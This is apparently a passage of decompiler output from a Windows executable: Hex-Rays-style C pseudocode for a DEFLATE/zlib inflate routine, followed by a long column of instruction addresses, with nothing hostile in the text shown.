																		__eflags = _t1219;
																		if(_t1219 >= 0) {
																			goto L210;
																		}
																		_t1216 = _v28;
																		__eflags = _t1364 - _t968 + 1;
																		if(_t1364 >= _t968 + 1) {
																			continue;
																		}
																		goto L217;
																	}
																	goto L210;
																}
																_t970 = _t960 >> 9;
																__eflags = _t970;
																if(_t970 == 0) {
																	goto L217;
																}
																__eflags = _t1364 - _t970;
																if(_t1364 < _t970) {
																	goto L217;
																}
																goto L210;
															}
															L203:
															__eflags = _t1364 - _t1200;
															if(_t1364 < _t1200) {
																L201:
																__eflags = _t1288 - _v36;
																if(_t1288 >= _v36) {
																	 *_t1350 = 0x19;
																	goto L335;
																}
																_t972 = ( *_t1288 & 0x000000ff) << _t1364;
																_t1288 = _t1288 + 1;
																_v8 = _v8 | _t972;
																_t1364 = _t1364 + 8;
																__eflags = _t1364;
																_t1200 = _v56;
																_v16 = _t1288;
																goto L203;
															}
															_t1364 = _t1364 - _t1200;
															_v8 = _v8 >> _t1200;
															_t474 =  &_v12;
															 *_t474 = _v12 + ((_v24 << _t1200) - 0x00000001 & _v8);
															__eflags =  *_t474;
															goto L205;
														}
														L194:
														_t1221 = _v32;
														__eflags = _t1221 - _v60;
														if(_t1221 >= _v60) {
															_t1113 = 2;
															_v20 = _t1113;
															 *_t1350 = 0x18;
															goto L339;
														}
														 *_t1221 = _t873;
														_t1222 =  &(_t1221[0]);
														__eflags = _t1222;
														L196:
														_v32 = _t1222;
														goto L154;
													}
													_t1199 = _t868 >> 9;
													_t873 = _t868 & 0x000001ff;
													_v12 = _t873;
													goto L191;
												}
												__eflags = _t1197 - 2;
												if(_t1197 >= 2) {
													_t1198 = _v8 | ( *(_t1288 + 1) & 0x000000ff) << _t1364 + 0x00000008 | ( *_v16 & 0x000000ff) << _t1364;
													_t1288 = _v16 + 2;
													_v8 = _t1198;
													_v16 = _t1288;
													_t1364 = _t1364 + 0x10;
													goto L179;
												}
												L175:
												_t900 =  *((short*)(_t1350 + 0x160 + (_v8 & 0x000003ff) * 2));
												_v40 = _t900;
												__eflags = _t900;
												if(_t900 < 0) {
													__eflags = _t1364 - 0xa;
													if(_t1364 <= 0xa) {
														L185:
														__eflags = _t1288 - _v36;
														if(_t1288 >= _v36) {
															 *_t1350 = 0x17;
															goto L335;
														}
														_t902 = ( *_t1288 & 0x000000ff) << _t1364;
														_t1288 = _t1288 + 1;
														_t1364 = _t1364 + 8;
														_t1198 = _v8 | _t902;
														_v16 = _t1288;
														_v8 = _t1198;
														__eflags = _t1364 - 0xf;
														if(_t1364 < 0xf) {
															goto L175;
														}
														goto L179;
													}
													_t1229 = 0xa;
													_v28 = _t1229;
													while(1) {
														_t1232 =  *((short*)(_t1350 + 0x960 + ((_v8 >> _t1229 & _v24) +  !_v40) * 2));
														_t908 = _v28 + 1;
														_v40 = _t1232;
														_v28 = _t908;
														__eflags = _t1232;
														if(_t1232 >= 0) {
															goto L178;
														}
														_t1229 = _v28;
														__eflags = _t1364 - _t908 + 1;
														if(_t1364 >= _t908 + 1) {
															continue;
														}
														goto L185;
													}
													goto L178;
												}
												_t910 = _t900 >> 9;
												__eflags = _t910;
												if(_t910 == 0) {
													goto L185;
												}
												__eflags = _t1364 - _t910;
												if(_t1364 < _t910) {
													goto L185;
												}
												goto L178;
											}
											_t1113 = 0xffffffff;
											__eflags = _v60 - _v32 - 2;
											if(_v60 - _v32 < 2) {
												goto L173;
											}
											__eflags = _t1364 - 0xf;
											if(_t1364 >= 0xf) {
												_t913 = _v8;
											} else {
												_t913 = _v8 | (( *(_t1288 + 1) & 0x000000ff) << 0x00000008 |  *_v16 & 0x000000ff) << _t1364;
												_t1288 = _v16 + 2;
												_v8 = _t913;
												_v16 = _t1288;
												_t1364 = _t1364 + 0x10;
											}
											_t915 =  *((short*)(_t1350 + 0x160 + (_t913 & 0x000003ff) * 2));
											_v12 = _t915;
											__eflags = _t915;
											if(_t915 < 0) {
												_t1233 = 0xa;
												do {
													_v12 =  !_v12;
													_t919 = (_v8 >> _t1233 & 0x00000001) + _v12;
													_t1233 = _t1233 + 1;
													_t873 =  *((short*)(_t1350 + 0x960 + _t919 * 2));
													_v12 = _t873;
													__eflags = _t873;
												} while (_t873 < 0);
												goto L163;
											} else {
												_t1233 = _t915 >> 9;
												L163:
												_v8 = _v8 >> _t1233;
												_t1364 = _t1364 - _t1233;
												__eflags = _t873 & 0x00000100;
												if((_t873 & 0x00000100) != 0) {
													goto L198;
												}
												__eflags = _t1364 - 0xf;
												if(_t1364 >= 0xf) {
													_t920 = _v8;
												} else {
													_t920 = _v8 | (( *(_t1288 + 1) & 0x000000ff) << 0x00000008 |  *_v16 & 0x000000ff) << _t1364;
													_t1288 = _v16 + 2;
													_v8 = _t920;
													_v16 = _t1288;
													_t1364 = _t1364 + 0x10;
												}
												_t922 =  *((short*)(_t1350 + 0x160 + (_t920 & 0x000003ff) * 2));
												_v28 = _t922;
												__eflags = _t922;
												if(_t922 < 0) {
													_t1234 = 0xa;
													_v40 = _t1234;
													do {
														_t926 = (_v8 >> _t1234 & _v24) +  !_v28;
														_t1234 = _v40 + 1;
														_v40 = _t1234;
														_t873 =  *((short*)(_t1350 + 0x960 + _t926 * 2));
														_v28 = _t873;
														__eflags = _t873;
													} while (_t873 < 0);
													goto L171;
												} else {
													_t1234 = _t922 >> 9;
													L171:
													_t1364 = _t1364 - _t1234;
													_v8 = _v8 >> _t1234;
													 *_v32 = _v12;
													_t1113 = 0xffffffff;
													__eflags = _t873 & 0x00000100;
													if((_t873 & 0x00000100) != 0) {
														_t456 =  &_v32;
														 *_t456 = _v32 + 1;
														__eflags =  *_t456;
														goto L198;
													}
													_t1239 = _v32;
													 *(_t1239 + 1) = _t873;
													_t1222 = _t1239 + 2;
													goto L196;
												}
											}
										}
										_v20 = 0x40 + _t865 * 0xda0 + _t1350;
										memset( &_v212, 0, 0x40);
										memset(_v20 + 0x120, 0, 0x800);
										memset(_v20 + 0x920, 0, 0x480);
										_t1304 = _t1350[6];
										_t1244 = 0;
										_t1379 = _t1379 + 0x24;
										__eflags =  *(_t1350 + 0x2c + _t1304 * 4);
										if( *(_t1350 + 0x2c + _t1304 * 4) <= 0) {
											L91:
											_v28 = _v28 & 0x00000000;
											_t1245 = 0;
											_v144 = _v144 & 0;
											_t189 =  &_v148;
											 *_t189 = _v148 & 0;
											__eflags =  *_t189;
											_t1305 = 4;
											do {
												_t988 =  *((intOrPtr*)(_t1378 + _t1305 - 0xd0));
												_v28 = _v28 + _t988;
												_t1245 = _t1245 + _t988 + _t1245 + _t988;
												 *((intOrPtr*)(_t1378 + _t1305 - 0x8c)) = _t1245;
												_t1305 = _t1305 + 4;
												__eflags = _t1305 - 0x3c;
											} while (_t1305 <= 0x3c);
											__eflags = _t1245 - 0x10000;
											if(_t1245 == 0x10000) {
												L95:
												_t989 = _t1350[6];
												_v52 = _v52 & 0x00000000;
												_v40 = _t1113;
												__eflags =  *(_t1350 + 0x2c + _t989 * 4);
												if( *(_t1350 + 0x2c + _t989 * 4) <= 0) {
													L117:
													__eflags = _t1350[6] - 2;
													if(_t1350[6] != 2) {
														L152:
														_t1350[6] = _t1350[6] - 1;
														goto L86;
													}
													_t1247 = 0;
													__eflags = 0;
													L119:
													_v12 = _t1247;
													__eflags = _t1247 - _t1350[0xc] + _t1350[0xb];
													if(_t1247 >= _t1350[0xc] + _t1350[0xb]) {
														__eflags = _t1350[0xc] + _t1350[0xb] - _t1247;
														if(_t1350[0xc] + _t1350[0xb] != _t1247) {
															_t1288 = _v16;
															L290:
															_v20 = _t1113;
															 *_t1350 = 0x15;
															goto L339;
														}
														memcpy( &(_t1350[0x10]),  &(_t1350[0xa49]), _t1350[0xb]);
														_t999 = _t1350[0xb] + 0x2924 + _t1350;
														__eflags = _t999;
														memcpy( &(_t1350[0x378]), _t999, _t1350[0xc]);
														_t1379 = _t1379 + 0x18;
														goto L152;
													}
													_t1288 = _v16;
													__eflags = _t1364 - 0xf;
													if(_t1364 >= 0xf) {
														L125:
														_t1248 = _v8;
														L126:
														_t1004 =  *((short*)(_t1350 + 0x1ca0 + (_t1248 & 0x000003ff) * 2));
														_v44 = _t1004;
														__eflags = _t1004;
														if(_t1004 < 0) {
															_t1249 = 0xa;
															do {
																_v44 =  !_v44;
																_t1008 = (_v8 >> _t1249 & 0x00000001) + _v44;
																_t1249 = _t1249 + 1;
																_t1009 =  *((short*)(_t1350 + 0x24a0 + _t1008 * 2));
																_v44 = _t1009;
																__eflags = _t1009;
															} while (_t1009 < 0);
															L138:
															_t1364 = _t1364 - _t1249;
															_t1011 = _v8 >> _t1249;
															_t1250 = _v44;
															_v8 = _t1011;
															_v48 = _t1364;
															__eflags = _t1250 - 0x10;
															if(__eflags >= 0) {
																if(__eflags != 0) {
																	L142:
																	_t1251 =  *((char*)(_t1250 +  &__imp__IsProcessorFeaturePresent));
																	_v56 = _t1251;
																	__eflags = _t1364 - _t1251;
																	if(_t1364 >= _t1251) {
																		L146:
																		_t1364 = _t1364 - _t1251;
																		_v48 = _t1364;
																		_t1252 = _v44;
																		_v8 = _t1011 >> _t1251;
																		_t336 = _t1252 + 0x411008; // 0x0
																		_t1310 = ((_v24 << _t1251) - 0x00000001 & _t1011) +  *_t336;
																		_t1014 = _v12;
																		_v52 = _t1310;
																		__eflags = _v44 - 0x10;
																		if(_v44 != 0x10) {
																			_t1253 = 0;
																			__eflags = 0;
																		} else {
																			_t1253 =  *(_t1014 +  &(_t1350[0xa48])) & 0x000000ff;
																		}
																		memset(_t1014 + 0x2924 + _t1350, _t1253, _t1310);
																		_t1379 = _t1379 + 0xc;
																		_t1247 = _v12 + _v52;
																		goto L119;
																	} else {
																		goto L143;
																	}
																	while(1) {
																		L143:
																		__eflags = _t1288 - _v36;
																		if(_t1288 >= _v36) {
																			break;
																		}
																		_t1019 = ( *_t1288 & 0x000000ff) << _t1364;
																		_t1288 = _t1288 + 1;
																		_v8 = _v8 | _t1019;
																		_t1364 = _t1364 + 8;
																		_t1251 = _v56;
																		_v16 = _t1288;
																		__eflags = _t1364 - _t1251;
																		if(_t1364 < _t1251) {
																			continue;
																		}
																		_t1011 = _v8;
																		goto L146;
																	}
																	 *_t1350 = 0x12;
																	goto L335;
																}
																__eflags = _v12;
																if(_v12 == 0) {
																	L287:
																	_v20 = _t1113;
																	 *_t1350 = 0x11;
																	goto L339;
																}
																goto L142;
															}
															_t1256 = _v12;
															 *((char*)(_t1256 +  &(_t1350[0xa49]))) = _v44;
															_t1247 = _t1256 + 1;
															goto L119;
														}
														_t1249 = _t1004 >> 9;
														_v44 = _t1004 & 0x000001ff;
														goto L138;
													}
													__eflags = _v36 - _t1288 - 2;
													if(_v36 - _t1288 >= 2) {
														_t1248 = _v8 | ( *(_t1288 + 1) & 0x000000ff) << _t1364 + 0x00000008 | ( *_v16 & 0x000000ff) << _t1364;
														_t1288 = _v16 + 2;
														_v8 = _t1248;
														_v16 = _t1288;
														_t1364 = _t1364 + 0x10;
														goto L126;
													}
													L122:
													_t1029 =  *((short*)(_t1350 + 0x1ca0 + (_v8 & 0x000003ff) * 2));
													_v40 = _t1029;
													__eflags = _t1029;
													if(_t1029 < 0) {
														__eflags = _t1364 - 0xa;
														if(_t1364 <= 0xa) {
															L132:
															__eflags = _t1288 - _v36;
															if(_t1288 >= _v36) {
																 *_t1350 = 0x10;
																goto L335;
															}
															_t1031 = ( *_t1288 & 0x000000ff) << _t1364;
															_t1288 = _t1288 + 1;
															_t1364 = _t1364 + 8;
															_t1248 = _v8 | _t1031;
															_v16 = _t1288;
															_v8 = _t1248;
															__eflags = _t1364 - 0xf;
															if(_t1364 < 0xf) {
																goto L122;
															}
															goto L126;
														}
														_t1263 = 0xa;
														_v28 = _t1263;
														while(1) {
															_t1266 =  *((short*)(_t1350 + 0x24a0 + ((_v8 >> _t1263 & _v24) +  !_v40) * 2));
															_t1037 = _v28 + 1;
															_v40 = _t1266;
															_v28 = _t1037;
															__eflags = _t1266;
															if(_t1266 >= 0) {
																goto L125;
															}
															_t1263 = _v28;
															__eflags = _t1364 - _t1037 + 1;
															if(_t1364 >= _t1037 + 1) {
																continue;
															}
															goto L132;
														}
														goto L125;
													}
													_t1039 = _t1029 >> 9;
													__eflags = _t1039;
													if(_t1039 == 0) {
														goto L132;
													}
													__eflags = _t1364 - _t1039;
													if(_t1364 < _t1039) {
														goto L132;
													}
													goto L125;
												}
												_t1375 = _v52;
												do {
													_t1315 = 0;
													_t1267 =  *(_t1375 + _v20) & 0x000000ff;
													_v52 = _t1267;
													__eflags = _t1267;
													if(_t1267 == 0) {
														goto L115;
													}
													_t1124 =  *(_t1378 + _t1267 * 4 - 0x90);
													_v28 = _t1267;
													 *(_t1378 + _t1267 * 4 - 0x90) = _t1124 + 1;
													do {
														_t1315 = _t1315 + _t1315 | _t1124 & _v24;
														_t1124 = _t1124 >> 1;
														_t1044 = _v28 - 1;
														_v28 = _t1044;
														__eflags = _t1044;
													} while (_t1044 != 0);
													_t1270 = _v52;
													__eflags = _t1270 - 0xa;
													if(_t1270 > 0xa) {
														_t1046 = _t1315 & 0x000003ff;
														_t1124 =  *(_v20 + 0x120 + _t1046 * 2);
														_v28 = _t1124;
														__eflags = _t1124;
														if(_t1124 == 0) {
															_t1128 = _v40;
															_v28 = _t1128;
															 *(_v20 + 0x120 + _t1046 * 2) = _t1128;
															_t1124 = _t1128 - 2;
															__eflags = _t1124;
															_t1350 = _v64;
															_v40 = _t1124;
														}
														_t1317 = _t1315 >> 9;
														__eflags = _t1270 - 0xb;
														if(_t1270 <= 0xb) {
															L114:
															_t1320 = (_t1317 >> 0x00000001 & _v24) - _v28;
															__eflags = _t1320;
															 *(_v20 + 0x91e + _t1320 * 2) = _t1375;
															goto L115;
														} else {
															_t1355 = _v24;
															_t244 = _t1270 - 0xb; // -11
															_t1127 = _t244;
															_t1271 = _v28;
															do {
																_t1317 = _t1317 >> 1;
																_t1051 = 0x48f - _t1271 - (_t1317 & _t1355);
																_t1274 =  *(_v20 + 0x91e) & 0x0000ffff;
																__eflags = _t1274;
																if(_t1274 != 0) {
																	_t1271 = _t1274;
																} else {
																	_t1271 = _v40;
																	 *(_v20 + _t1051 * 2) = _t1271;
																	_t1355 = _v24;
																	_v40 = _t1271 - 2;
																}
																_t1127 = _t1127 - 1;
																__eflags = _t1127;
															} while (_t1127 != 0);
															_t1350 = _v64;
															_v28 = _t1271;
															goto L114;
														}
													}
													_v52 = (_t1270 << 0x00000009 | _t1375) & 0x0000ffff;
													__eflags = _t1315 - 0x400;
													if(_t1315 >= 0x400) {
														goto L115;
													}
													_t1358 = _v52;
													_t1124 = _v24 << _t1270;
													_t1060 = _v20 + _t1315 * 2 + 0x120;
													__eflags = _t1060;
													_t1275 = _t1124 + _t1124;
													do {
														 *_t1060 = _t1358;
														_t1315 = _t1315 + _t1124;
														_t1060 = _t1060 + _t1275;
														__eflags = _t1315 - 0x400;
													} while (_t1315 < 0x400);
													_t1350 = _v64;
													L115:
													_t1041 = _t1350[6];
													_t1375 = _t1375 + 1;
													__eflags = _t1375 -  *((intOrPtr*)(_t1350 + 0x2c + _t1041 * 4));
												} while (_t1375 <  *((intOrPtr*)(_t1350 + 0x2c + _t1041 * 4)));
												_t1364 = _v48;
												_t1113 = _t1124 | 0xffffffff;
												__eflags = _t1113;
												goto L117;
											}
											__eflags = _v28 - _v24;
											if(_v28 > _v24) {
												_t1288 = _v16;
												L285:
												_v20 = _t1113;
												 *_t1350 = 0x23;
												goto L339;
											}
											goto L95;
										}
										_t1123 = _v20;
										do {
											 *((intOrPtr*)(_t1378 + ( *(_t1244 + _t1123) & 0x000000ff) * 4 - 0xd0)) =  *((intOrPtr*)(_t1378 + ( *(_t1244 + _t1123) & 0x000000ff) * 4 - 0xd0)) + 1;
											_t1244 = _t1244 + 1;
											__eflags = _t1244 -  *(_t1350 + 0x2c + _t1304 * 4);
										} while (_t1244 <  *(_t1350 + 0x2c + _t1304 * 4));
										_t1113 = _t1123 | 0xffffffff;
										__eflags = _t1113;
										goto L91;
									}
									__eflags = _t1364 - 3;
									if(_t1364 >= 3) {
										L80:
										_t135 = _t864 + 0x411a34; // 0x121110
										_t1277 = _t1303 & 0x00000007;
										_t1303 = _t1303 >> 3;
										_t1364 = _t1364 - 3;
										_v8 = _t1303;
										_v48 = _t1364;
										 *( &(_t1350[0x6e0]) + ( *_t135 & 0x000000ff)) = _t1277;
										_t864 = _v12 + 1;
										goto L74;
									}
									_t1288 = _v16;
									while(1) {
										L77:
										__eflags = _t1288 - _v36;
										if(_t1288 >= _v36) {
											break;
										}
										_t1066 = ( *_t1288 & 0x000000ff) << _t1364;
										_t1288 = _t1288 + 1;
										_v8 = _v8 | _t1066;
										_t1364 = _t1364 + 8;
										_v16 = _t1288;
										__eflags = _t1364 - 3;
										if(_t1364 < 3) {
											continue;
										}
										_t864 = _v12;
										_t1303 = _v8;
										goto L80;
									}
									 *_t1350 = 0xe;
									goto L335;
								}
								_t1067 = 0x20;
								_t1350[0xc] = _t1067;
								_t1376 =  &(_t1350[0x10]);
								_t1350[0xb] = 0x120;
								memset( &(_t1350[0x378]), 5, _t1067);
								_t1359 = _v80;
								E0040FDD0(_t1376, 8, _t1359);
								_t1377 = _t1376 + _t1359;
								E0040FDD0(_t1377, 9, 0x70);
								_t1279 = 6;
								memset(_t1377 + 0x70, 0x7070707, _t1279 << 2);
								_t1379 = _t1379 + 0x30;
								_t1350 = _v64;
								 *((intOrPtr*)(_t1377 + 0x88)) = 0x8080808;
								 *((intOrPtr*)(_t1377 + 0x8c)) = 0x8080808;
								_t1364 = _v48;
								goto L86;
							}
							_t1075 = _t770 - 1;
							__eflags = _t1075;
							if(_t1075 == 0) {
								goto L304;
							}
							_t1077 = _t1075;
							__eflags = _t1077;
							if(_t1077 == 0) {
								_t1119 = _v8;
								goto L322;
							}
							_t1078 = _t1077 - 1;
							__eflags = _t1078;
							if(_t1078 == 0) {
								_t1119 = _v8;
								goto L327;
							}
							_t1079 = _t1078 - 9;
							__eflags = _t1079;
							if(_t1079 == 0) {
								goto L270;
							}
							_t1080 = _t1079 - 1;
							__eflags = _t1080;
							if(_t1080 == 0) {
								_t846 = _v44;
								goto L276;
							}
							__eflags = _t1080 == 1;
							if(_t1080 == 1) {
								goto L235;
							}
							goto L343;
						}
						if(__eflags == 0) {
							goto L296;
						}
						_t1082 = _t769 - 0x19;
						__eflags = _t1082;
						if(_t1082 == 0) {
							goto L201;
						}
						_t1083 = _t1082 - 1;
						__eflags = _t1083;
						if(_t1083 == 0) {
							goto L217;
						}
						_t1084 = _t1083 - 1;
						__eflags = _t1084;
						if(_t1084 == 0) {
							goto L226;
						}
						_t1085 = _t1084 - 5;
						__eflags = _t1085;
						if(_t1085 == 0) {
							goto L306;
						}
						_t1087 = _t1085;
						__eflags = _t1087;
						if(_t1087 == 0) {
							goto L333;
						}
						_t1088 = _t1087 - 1;
						__eflags = _t1088;
						if(_t1088 == 0) {
							goto L285;
						}
						__eflags = _t1088 != 1;
						if(_t1088 != 1) {
							goto L339;
						}
						L49:
						_v20 = _t1113;
						 *_t1350 = 0x24;
						goto L339;
					}
					if(_t1384 == 0) {
						_t873 = _v12;
						goto L194;
					}
					_t1385 = _t769 - 0xa;
					if(_t1385 > 0) {
						_t1090 = _t769 - 0xb;
						__eflags = _t1090;
						if(_t1090 == 0) {
							goto L81;
						}
						_t1091 = _t1090 - 3;
						__eflags = _t1091;
						if(_t1091 == 0) {
							goto L77;
						}
						_t1093 = _t1091;
						__eflags = _t1093;
						if(_t1093 == 0) {
							goto L132;
						}
						_t1094 = _t1093 - 1;
						__eflags = _t1094;
						if(_t1094 == 0) {
							goto L287;
						}
						_t1095 = _t1094 - 1;
						__eflags = _t1095;
						if(_t1095 == 0) {
							goto L143;
						}
						_t1096 = _t1095 - 3;
						__eflags = _t1096;
						if(_t1096 == 0) {
							goto L290;
						}
						__eflags = _t1096 == 0;
						if(_t1096 == 0) {
							goto L185;
						}
						goto L339;
					}
					if(_t1385 == 0) {
						goto L298;
					}
					if(_t769 > 9) {
						goto L343;
					}
					switch( *((intOrPtr*)(_t769 * 4 +  &M00405E60))) {
						case 0:
							_t1099 = _v28;
							_t1170 = _t1099;
							_t1350[3] = _t1099;
							_t1364 = _t1099;
							_t1350[2] = _t1099;
							_v56 = _t1099;
							_v12 = _t1099;
							_v44 = _t1099;
							_t1100 = _v24;
							_v8 = _t1170;
							_t1350[7] = _t1100;
							_t1350[4] = _t1100;
							if((_a20 & _t1100) == 0) {
								goto L66;
							}
							goto L12;
						case 1:
							L12:
							_t1281 = _v36;
							_t1101 = _t1288;
							if(_t1101 < _t1281) {
								_t1288 = _t1288 + 1;
								_t1350[2] =  *_t1101 & 0x000000ff;
								goto L16;
							}
							_t772 = _v24;
							 *_t1350 = _t772;
							goto L336;
						case 2:
							__ecx = _v36;
							L16:
							__eflags = _t1288 - _t1281;
							if(_t1288 < _t1281) {
								_t1103 =  *_t1288 & 0x000000ff;
								_t1282 = _t1350[2];
								_v28 = _t1103;
								_t1350[3] = _t1103;
								_t1106 = (_t1282 << 8) + _v28;
								_v16 = _t1288 + 1;
								_v40 = 0x1f;
								__eflags = _t1106 % _v40;
								if(_t1106 % _v40 != 0) {
									L23:
									_t1348 = _v24;
									_t1108 = _t1348;
									L24:
									__eflags = _v52;
									_v12 = _t1108;
									if(_v52 != 0) {
										L30:
										_t1288 = _v16;
										__eflags = _t1108;
										if(_t1108 != 0) {
											goto L49;
										}
										goto L63;
									}
									_t1349 = _t1348 << (_t1282 >> 4) + 8;
									__eflags = _t1349 - 0x8000;
									if(_t1349 > 0x8000) {
										L28:
										_t1285 = _v24;
										L29:
										_t1108 = _t1108 | _t1285;
										__eflags = _t1108;
										_v12 = _t1108;
										goto L30;
									}
									_push(0xffffffff);
									_pop(_t1113);
									__eflags = _v68 + 1 - _t1349;
									if(_v68 + 1 < _t1349) {
										goto L28;
									}
									_t1285 = 0;
									goto L29;
								}
								__eflags = _v28 & 0x00000020;
								if((_v28 & 0x00000020) != 0) {
									goto L23;
								}
								__eflags = (_t1282 & 0x0000000f) - 8;
								if((_t1282 & 0x0000000f) != 8) {
									goto L23;
								}
								_t1348 = _v24;
								_t1108 = 0;
								goto L24;
							}
							_push(2);
							_pop(_t1111);
							__eflags = _a20 & _t1111;
							_push(0xfffffffc);
							_pop(_t1131);
							_t1113 =  !=  ? _v24 : _t1131;
							 *_t1350 = _t1111;
							goto L18;
						case 3:
							goto L64;
						case 4:
							goto L339;
						case 5:
							goto L251;
						case 6:
							goto L258;
						case 7:
							goto L262;
						case 8:
							__ecx = _v32;
							goto L279;
					}
				}
			}



















































































































































































































































                  0x00404ad4
                  0x00404ae4
                  0x00404ae9
                  0x00404aee
                  0x00404af1
                  0x00404af4
                  0x00404afb
                  0x00404afd
                  0x00404b00
                  0x00404b03
                  0x00404b05
                  0x00404b0b
                  0x00404b11
                  0x00404b14
                  0x00404b17
                  0x00404b23
                  0x00404b26
                  0x00404b26
                  0x00404b28
                  0x00404b19
                  0x00404b19
                  0x00404b1b
                  0x00404b1b
                  0x00404b2b
                  0x00404b30
                  0x00405e4f
                  0x00405e52
                  0x00405e55
                  0x00405e55
                  0x00405e58
                  0x00000000
                  0x00404b3f
                  0x00404b42
                  0x00404b46
                  0x00404b49
                  0x00404b4c
                  0x00404b52
                  0x00404b58
                  0x00404b5e
                  0x00404b61
                  0x00404b63
                  0x00404b66
                  0x00404b69
                  0x00404b70
                  0x00404b77
                  0x00404b7a
                  0x00404cca
                  0x00404ccd
                  0x00404d19
                  0x00404d19
                  0x00404d1c
                  0x00404d50
                  0x00404d53
                  0x00404d56
                  0x00404d56
                  0x00404d59
                  0x00405ca3
                  0x00405ca9
                  0x00405ca9
                  0x00405cac
                  0x00405cb2
                  0x00405cb3
                  0x00405cb6
                  0x00405cb6
                  0x00405cbb
                  0x00405cd4
                  0x00405cd6
                  0x00405cdb
                  0x00405ce1
                  0x00405ce4
                  0x00405ce9
                  0x00405cf6
                  0x00405cfc
                  0x00405d02
                  0x00405d08
                  0x00405d0e
                  0x00405d14
                  0x00405d19
                  0x00405d20
                  0x00405d23
                  0x00405d25
                  0x00405e46
                  0x00000000
                  0x00405d33
                  0x00405d35
                  0x00405d3c
                  0x00405d3f
                  0x00405d42
                  0x00405d45
                  0x00405d4c
                  0x00405d4f
                  0x00405e2b
                  0x00405e30
                  0x00405e35
                  0x00405e42
                  0x00405e43
                  0x00405e43
                  0x00000000
                  0x00405e35
                  0x00405d55
                  0x00405d5a
                  0x00405d5a
                  0x00405d5c
                  0x00405d62
                  0x00405de9
                  0x00405deb
                  0x00000000
                  0x00000000
                  0x00405ded
                  0x00405df0
                  0x00405df2
                  0x00405df5
                  0x00405df7
                  0x00405df8
                  0x00405dfa
                  0x00405dfa
                  0x00405dfd
                  0x00000000
                  0x00405dfd
                  0x00405d68
                  0x00405d6b
                  0x00405d6e
                  0x00405d71
                  0x00405d74
                  0x00405d76
                  0x00405d79
                  0x00405d7f
                  0x00405d8a
                  0x00405d95
                  0x00405da0
                  0x00405dab
                  0x00405db6
                  0x00405dc1
                  0x00405dcc
                  0x00405dd1
                  0x00405dd4
                  0x00405dd6
                  0x00405ddb
                  0x00405ddf
                  0x00405de2
                  0x00405de4
                  0x00000000
                  0x00405e00
                  0x00405e08
                  0x00405e11
                  0x00405e14
                  0x00405e16
                  0x00405e19
                  0x00405e1c
                  0x00405e1c
                  0x00405e25
                  0x00405e28
                  0x00000000
                  0x00405e28
                  0x00405cc2
                  0x00405cc2
                  0x00405cc2
                  0x00405cd0
                  0x00405cc7
                  0x00405cca
                  0x00000000
                  0x00000000
                  0x00405ccc
                  0x00405ccd
                  0x00405ccd
                  0x00405ccd
                  0x00000000
                  0x00405cd0
                  0x00405cbb
                  0x00404d5f
                  0x00404d62
                  0x00404d67
                  0x00404d69
                  0x00404d6b
                  0x00404d6e
                  0x00404d70
                  0x00404d78
                  0x00404d81
                  0x00404d87
                  0x00404d8c
                  0x00404d8e
                  0x00404d8e
                  0x00404d90
                  0x00404d93
                  0x00404d96
                  0x00404d99
                  0x00404d9c
                  0x00404d9c
                  0x00404d9e
                  0x00405a60
                  0x00405a60
                  0x00405a63
                  0x00405a65
                  0x00000000
                  0x00000000
                  0x00405a6d
                  0x00405a6e
                  0x00405a71
                  0x00000000
                  0x00405a71
                  0x00404da4
                  0x00404da4
                  0x00404da8
                  0x00405b9d
                  0x00405b9f
                  0x00405bd2
                  0x00405bd5
                  0x00405bd5
                  0x00405bda
                  0x00405bdd
                  0x00405bdf
                  0x00405be1
                  0x00405be3
                  0x00405bf5
                  0x00405bf9
                  0x00405bfb
                  0x00405bfe
                  0x00405c01
                  0x00405c04
                  0x00405c06
                  0x00405c09
                  0x00405c0d
                  0x00405c0f
                  0x00405c13
                  0x00405c16
                  0x00405c93
                  0x00405c93
                  0x00405c96
                  0x00405c96
                  0x00405c98
                  0x00404c02
                  0x00404c02
                  0x00000000
                  0x00404c02
                  0x00405c18
                  0x00405c18
                  0x00405c1a
                  0x00405c1a
                  0x00405c1d
                  0x00405c20
                  0x00000000
                  0x00000000
                  0x00405c22
                  0x00405c24
                  0x00405c5e
                  0x00405c66
                  0x00405c66
                  0x00405c69
                  0x00405c8b
                  0x00000000
                  0x00405c8b
                  0x00405c6b
                  0x00405c6e
                  0x00405c6e
                  0x00405c6f
                  0x00405c72
                  0x00405c7d
                  0x00405c80
                  0x00000000
                  0x00405c80
                  0x00405c26
                  0x00405c29
                  0x00405c50
                  0x00405c50
                  0x00405c53
                  0x00405c56
                  0x00405c59
                  0x00000000
                  0x00405c59
                  0x00405c2b
                  0x00405c33
                  0x00405c33
                  0x00405c33
                  0x00405c36
                  0x00000000
                  0x00000000
                  0x00405c3d
                  0x00405c3f
                  0x00405c40
                  0x00405c42
                  0x00405c45
                  0x00405c48
                  0x00405c4b
                  0x00405c4e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405c4e
                  0x00405c83
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405be5
                  0x00405be5
                  0x00405be5
                  0x00405be8
                  0x00000000
                  0x00000000
                  0x00405bea
                  0x00405beb
                  0x00405bee
                  0x00405bf0
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405bf0
                  0x00405bf2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405ba1
                  0x00405ba1
                  0x00405ba1
                  0x00405ba4
                  0x00000000
                  0x00000000
                  0x00405ba9
                  0x00405bae
                  0x00405bb1
                  0x00405bb3
                  0x00405bb4
                  0x00405bb6
                  0x00405bbb
                  0x00405bc1
                  0x00405bc3
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405bc5
                  0x00405bc7
                  0x00000000
                  0x00405bc7
                  0x00404dae
                  0x00404dae
                  0x00404dd2
                  0x00404dd2
                  0x00404dd5
                  0x00404db3
                  0x00404db3
                  0x00404db6
                  0x00405a7c
                  0x00000000
                  0x00405a7c
                  0x00404dc1
                  0x00404dc3
                  0x00404dc7
                  0x00404dc9
                  0x00404dcc
                  0x00404dcf
                  0x00404dcf
                  0x00000000
                  0x00404dcf
                  0x00404dd9
                  0x00404ddc
                  0x00404de2
                  0x00404de5
                  0x00404de5
                  0x00404de7
                  0x00404dea
                  0x00404ded
                  0x00404df0
                  0x0040592c
                  0x00405931
                  0x00405933
                  0x00405912
                  0x00405912
                  0x00405915
                  0x00405b4d
                  0x00000000
                  0x00405b4d
                  0x00405920
                  0x00405922
                  0x00405923
                  0x00405926
                  0x00405926
                  0x00405929
                  0x00000000
                  0x00405929
                  0x0040593a
                  0x0040593d
                  0x0040593f
                  0x00405941
                  0x00405944
                  0x00405944
